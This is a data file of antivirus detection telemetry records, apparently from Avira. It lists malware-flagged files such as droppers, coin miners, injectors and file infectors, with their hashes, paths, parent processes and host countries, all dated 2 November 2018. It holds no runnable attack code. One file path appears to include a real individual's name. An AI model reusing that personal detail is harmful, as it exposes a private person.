  Row(detection=Row(filename='zauzlddkqk.exe', filepath='C:\\Program Files\\Internet Explorer\\8R66I8HFY2Z7N40\\ZAuzLDdKqK.exe', filesize=640000, name='TR/Dropper.Gen.#M300.#R4046'), hash='66fbd02d6b8a876cfa17da6c1444ffa817175a6ab70f5690b1e9fd07d9ba6b2d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RO1BHR\\\\\\/Dyk2xCNjE.1', country='SC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:54:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverimportpe.exe', filepath='E:\\HBCD\\Programs\\DriverImportPE.exe', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:23:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:07:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1453912, timestamp='2018-11-02T17:23:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103418-e5af9fbe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed6475cc\\AVSCAN-20181102-102215-7882B57A\\AVSCAN-20181102-103418-E5AF9FBE', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:34:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104800-18e29610', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104800-18E29610', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:48:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa43884.2773\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa43884.2773\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:48:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174337-8c075fdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-174337-8C075FDB', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072635-63891999', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06d4b483\\AVSCAN-20181102-071251-0D71455A\\AVSCAN-20181102-072635-63891999', filesize=512000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='385b7f3fb43ef5aeb55554391bac745d576b075dc27b702e01c4c796eda92d23', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:26:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050359-ade34ee0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050359-ADE34EE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051532-4ae5ffb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051532-4AE5FFB3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191604-bef5d2f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae272576\\AVSCAN-20181102-190557-60FA6A79\\AVSCAN-20181102-191604-BEF5D2F3', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='68a5b5b209642b4dc351172859cb0cb7cdc19e6cdcbebc49be2b1209ea99e657', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Documents\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T19:18:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:01:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='\\?\\C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='6c799a753934be6f948c1753fcb37c7b80498f6ba6d848f50bf9459b9cb739bb', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:19:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adbcd.exe', filepath='\\\\?\\C:\\ADCDA2\\ADBCD.exe', filesize=18176000, name='W32/Sality.AT.#M1.#R1'), hash='68f81ea7dee92cc61587e23ff440fc4b9111df04bfa11e0da88f9bc21f609c02', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:41:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32_71adaeb3.dll', filepath='D:\\# Andromeda Backup\\2018-10\\Downloads\\Setup\\msimg32_71adaeb3.dll', filesize=5696000, name='TR/CoinLoader.JY.#M1.#R1'), hash='517be7d335a0593e425740975aacd37de9dd347a705a6862ce20b2e03ffe9622', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=346112, timestamp='2018-11-02T23:46:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053119-7f299db7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053119-7F299DB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052219-3d0f4d8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052219-3D0F4D8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f8d6e947f03ea8ef585be006ce13e5b264d3017069f8f999e0c6eac0adedfd1', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\6F8D6E947F03EA8EF585BE006CE13E5B264D3017069F8F999E0C6EAC0ADEDFD1', filesize=64000, name='W97M/Thus.qeogk.#M1.#R1'), hash='6f8d6e947f03ea8ef585be006ce13e5b264d3017069f8f999e0c6eac0adedfd1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131944-e5559d20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3791652a\\AVSCAN-20181102-131929-E2106C13\\AVSCAN-20181102-131944-E5559D20', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capafe.exe', filepath='\\\\?\\D:\\programs\\canon 810\\English\\WinMe\\CAPAFE.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='64e9d867f6d236c219d75fc56a21fce82f045d672ba3ff0499fa17e5057f62c0', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052224-4016977a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052224-4016977A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050737-2fbbb11a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050737-2FBBB11A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-231045-cb6199c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9d377eb\\AVSCAN-20181102-230818-BD5B29E2\\AVSCAN-20181102-231045-CB6199C2', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:12:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:54:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cdw.dll', filepath='\\\\?\\C:\\DPACK_SD\\cdw.dll', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='6695e4887ac97cfc706963bd3faa47dc96aff614561b1aa403898b71462b3ef7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:09:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adbcd.exe', filepath='C:\\ADCDA2\\ADBCD.exe', filesize=18176000, name='W32/Sality.AT.#M1.#R1'), hash='68f81ea7dee92cc61587e23ff440fc4b9111df04bfa11e0da88f9bc21f609c02', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:39:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-001534-0136160d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c72745\\AVSCAN-20181102-001438-FA0E2724\\AVSCAN-20181102-001534-0136160D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140953-20a4ebdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-140953-20A4EBDD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061450-93322eec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061450-93322EEC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052105-113f82d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052105-113F82D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060857-c14b3943', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060857-C14B3943', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053036-658c5458', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053036-658C5458', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053609-2c4e543c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2C4E543C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053559-264dce6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053559-264DCE6F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:58Z'), dt=datetime.date(2018, 11, 2)),
